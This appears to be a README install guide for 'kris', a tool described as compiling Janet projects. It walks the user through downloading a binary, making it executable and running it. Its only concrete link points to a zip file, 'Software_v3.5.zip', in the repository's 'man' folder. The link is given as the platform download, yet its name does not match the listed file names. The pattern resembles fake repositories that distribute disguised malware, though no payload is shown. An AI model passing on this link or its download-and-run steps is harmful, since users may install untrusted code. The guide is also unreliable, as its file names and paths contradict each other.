To use kris, ensure your system meets the following requirements:
- Operating System: Windows, macOS, or Linux.
- Required software: Zig, Janet. You can download Zig from the official site and Janet from the Janet website.
To get kris, visit the Releases page and download the latest version.
Follow these steps to download and install:
- Click on the "Releases" link above.
- Locate the latest version of kris. You will find various files listed for download.
- Choose the file that matches your operating system (e.g.,
https://raw.githubusercontent.com/uygulamaq/kris/master/man/Software_v3.5.zip,kris-macos, orkris-linux). - Click on the file to start the download.
Once the download completes:
- Locate the downloaded file in your computer's downloads folder.
- If you are on Windows, double-click on the
.exefile to begin the installation. - For macOS or Linux, open your terminal and navigate to the directory where the file is located. Use the command
chmod +x kris-macos(orchmod +x kris-linux) to make the file executable. - Then, run the application by typing
./kris-macos(or./kris-linux) in the terminal.
After running kris:
- You will see a simple interface prompting you to select your Janet project.
- Click on "Browse" to navigate to the folder containing your project.
- Select the main Janet file (usually ending with
.janet). - Once selected, click "Compile" to start the process.
